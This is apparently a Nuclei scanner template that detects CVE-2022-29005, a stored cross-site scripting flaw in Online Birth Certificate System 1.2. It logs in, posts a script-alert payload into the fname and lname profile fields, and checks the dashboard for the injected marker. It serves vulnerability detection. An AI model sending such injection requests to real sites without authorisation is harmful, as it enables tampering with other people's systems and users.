id: CVE-2022-29005 info: name: Online Birth Certificate System 1.2 - Stored Cross-Site Scripting author: TenBird severity: medium description: | Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters. reference: - https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt - https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/ - https://nvd.nist.gov/vuln/detail/CVE-2022-29005 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-29005 cwe-id: CWE-79 metadata: verified: "true" tags: cve,cve2022,xss,obcs,authenticated requests: - raw: - | POST /obcs/user/login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 mobno={{username}}&password={{password}}&login= - | POST /obcs/user/profile.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 fname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit= - | GET /obcs/user/dashboard.php HTTP/1.1 Host: {{Hostname}} req-condition: true host-redirects: true max-redirects: 2 cookie-reuse: true matchers: - type: dsl dsl: - 'contains(all_headers_3, "text/html")' - 'status_code_3 == 200' - contains(body_3, 'admin-name\">nuclei') condition: and # Enhanced by mp on 2022/09/14